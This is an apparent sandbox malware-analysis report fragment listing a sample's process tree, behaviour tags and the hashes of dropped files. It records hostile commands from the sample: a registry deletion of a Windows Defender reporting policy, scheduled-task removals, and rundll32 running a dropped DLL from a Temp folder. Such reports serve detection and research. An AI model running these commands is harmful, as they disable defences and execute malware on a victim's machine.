C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:736
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MZObKWyefxVnmbFER"2⤵PID:1784
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\pNRMKCwFqwdxSFZt\XEKqWdtq\SVEmYHH.dll",#1 /gNsite_idHFX 3851181⤵PID:4432
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\pNRMKCwFqwdxSFZt\XEKqWdtq\SVEmYHH.dll",#1 /gNsite_idHFX 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4424 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "teabCtqLwEhjalrvZ"3⤵PID:2840
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ee99a53bbe6ed9fd608560c8b0aae675
SHA15a742fce7b12073437109a46719e228b0f1e44bc
SHA2565c411c09398a1593a73c49df909387b59fe7b8dc80fcf2e654d4e9db23cad7b8
SHA512cf9f2a2fee36bf796a2963deb78a46634fbe2f8b2653bdc09242f82951bfb2e17e0d5399a5ff8f7c4b0eeaf845f944b3756ef662bf6d878b1c6cd3b9a84dabb9
-
Filesize
2KB
MD5144b885bb8462c4a0334d0b3a566f4cf
SHA1064903da3ebc6430fce2890f00c8dec9ecdfa9df
SHA2563a37ec3a4981be9da25708a90f0ce59b3a547d0def3bf28fccab9e122444ae3c
SHA512050fd3825d95aa22bf0618af911b7e62173d6a37d3682a19f5161ebba1605d089da12c6453a822ba90215f8cfee8eb0fe8283eff36f60d9a595c66f2b13dc11b
-
Filesize
2KB
MD58e1bd49b8966278c6270366f709dbf96
SHA10ec841f06bbf349a786715f7c55fb283c3439a26
SHA256dba7a71fbbd4e8e1a55e9916bab0d1f340d3f5b1eb97cb4802381e3743c2842b
SHA512a4129c8cdb4cec0579eec013fa29aebcab328f8b32dddf6d6b61cb73d9c70e24088c1c4afeb45efed798cf3e81a648e3a5a76add04400cf0a549df9d64875a93
-
Filesize
2KB
MD5599613841f7770a149c1af662cb851ec
SHA13f385efcea33605beb5b5682cde9b42de21694ac
SHA2566edf770d400e4fe5559449d8396a35ff434c3893e06d871dde22e78958918182
SHA512376f721aad718b06902bfec875d77e7a7b7906e7c7cdb2d2405b5499b343d45328ded170b37e3498d5be2f1c30df9df9c246a15d5a697c23f6bfa52cc0767627
-
Filesize
1.1MB
MD5038e7df8a588783498c7326260414f67
SHA1bb049be3deb6f9d5f232b7f08a00d0f15431de4c
SHA2560fc4fefe1adff3fef538da0ffbc64cb7e1e09b02db0338038521d8cd6b43fccf
SHA5128bba6fcc350c5841e4a9a98cbdb1f79f516588acc64ad561e5f90f1e789e9ec960f80af18b6e6a38582a734e2637d46f14ed56b8853be56352787ca9381ef916
-
Filesize
2KB
MD54b20403bb087d78a0eff268f9c3cb9ce
SHA1a795d25cbff700970bb12d1bc15fce3874687906
SHA2561c198e6127c7c568bb88bbcfbfea6331eed1b928c648386d2e0e1f5c2690d439
SHA51233b38b72a0852a5740587848ba6e1265c69a9d55687b9c4f2b2331ce7900b27c46724db86f9a784e4fdefccaa4873bf511da5c27e56e477de65acd86f2ad988a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
12KB
MD50f94097bf1ff3a0338d1c81d62fda822
SHA1cd86853bea6b36c97c8bca557c9272a37192def2
SHA256a47435518423577bfa695add01f52a357e8c75c01728e0c6e10d7e6a529db7e4
SHA5122ab58f28680a17d14ab8f23f4f7ea5ac66d7fcd2b59b3811066e10634c80f3d874b47f34e3cc32b1e57fea01e515162e64be15cfaab42bb8f33b339496753f2a
-
Filesize
28KB
MD5f7d179549f275fafbf65d576209c10d5
SHA11c4bc840e8caad48784ee013c80ec706a10ef938
SHA25664c45b5e99a63f52c08fd0129ead1781daa5dfeb81cfb4f06d28462fec2494f9
SHA51243c909d3f34200c0c6fbd491e9ae8a0ec8d2d60586ed07e2feba4a5795093a32345d0cdb2f1618dc566a663520a0b9a1f93f05ec64881b0eff4594c4fb37bc3b
-
Filesize
3KB
MD5f6c90ab0db80c6c3ea92556fda7273c7
SHA101d3866b1887cbb0abe9701f6b49c5dbc66a7dfa
SHA256a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269
SHA512aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe
-
Filesize
1KB
MD559805635e79bd95a256948e1c7d1467d
SHA1660ed2d819511db3d73a0591a7d3b4180e883742
SHA25653e897ecd0b43201b6bd4581418edd61a34f172ac68f41fea57df161607bf6d0
SHA512bb626f8d2cd7418a2cc81fe397437e14c38535973db1b5808650efa49bde9e230e0ab0579883d20f6dc9a61abec9decb46a4fe4cd8e4f377115a0f83822026ee
-
Filesize
6.3MB
MD58e7762c25222df3d9c47b6765d9fd929
SHA1eea05c8c1cff62344146560ec342fba41c42a07f
SHA25648971f35126b40a980771c3547ee8093eacafee9d74ff271c44534fc0b11b861
SHA512515ab8faf80071d50617c34a4036bd5f18b0bde4f72d5d7c01ef42bfaf9ca773dec934abbf82deee1a1a8fa8281fc0180dfc1c2d252dea98ecfbe72b549bf6c7
-
Filesize
6.3MB
MD58e7762c25222df3d9c47b6765d9fd929
SHA1eea05c8c1cff62344146560ec342fba41c42a07f
SHA25648971f35126b40a980771c3547ee8093eacafee9d74ff271c44534fc0b11b861
SHA512515ab8faf80071d50617c34a4036bd5f18b0bde4f72d5d7c01ef42bfaf9ca773dec934abbf82deee1a1a8fa8281fc0180dfc1c2d252dea98ecfbe72b549bf6c7
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
7KB
MD5fda85563d7d5b49c19436cdfe748f165
SHA1407af7550dcab5d68c7e017122bfe30b32171709
SHA256d50f695a93b63070027d8c2619344f758144139431e2a77357ff4ced87f96820
SHA512f8a3f3816545b7da424d1f2ed96b33e11dd6208774117567df77bb5e98a03b7d790a7c8361ea39542cc4d09345fa6ff5804c792a5bd94a6047946b78bffc08a9
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD50f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD575112412604deea52f3f2f8f7bcdb27a
SHA14f003effb9ea522652d850a9d51b31f08b71ae03
SHA25610797c77c68f51166668b7ecf24e4b49c1bb151fec3a6820394564c97f63bd83
SHA5126f93867e780618cfdffb027dcb6ec0680f41a241ba85352a619744c891bb16639c26862260401c8fc3f5f81c3eb7a63ba1b4dae6a535ba355832ed17b7b8e1e8
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
6.1MB
MD59f51792f0386c429ef1bc4bb5a3eff82
SHA1d82c02b8fe37bc8ae03e00a225c68f9c0c3ef100
SHA2560c632a3f1d7503041909461bf8ca77e2c988203eaf0ad14488368db5e7a9e12d
SHA51211281e81d42432b152534251e2e2d4825de8bf0b5ab72f7fbd0d530b4782c8a20eafd3c8a00fc0303b3e3b17a293790447f33745ecd4b6e3c26fb5ac13d43210
-
Filesize
6KB
MD53beaf6554db4ea7281a1960a259c3b5a
SHA1af61f3bd0f4ef848691818ecc50d2fcc561f79b4
SHA256960a330c8dac0d89c0444ab3cd2a6f42bf6d4443765252a58459f5786209d9ca
SHA5129f6de94bd5895c4590ac1feaacc75abcb52dadd3b34dc49839350c4376ccd8e1f96a38b696d0f7fa0851e72f789581610c0187ada610ccf87188cd99d5d804ff
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.1MB
MD59f51792f0386c429ef1bc4bb5a3eff82
SHA1d82c02b8fe37bc8ae03e00a225c68f9c0c3ef100
SHA2560c632a3f1d7503041909461bf8ca77e2c988203eaf0ad14488368db5e7a9e12d
SHA51211281e81d42432b152534251e2e2d4825de8bf0b5ab72f7fbd0d530b4782c8a20eafd3c8a00fc0303b3e3b17a293790447f33745ecd4b6e3c26fb5ac13d43210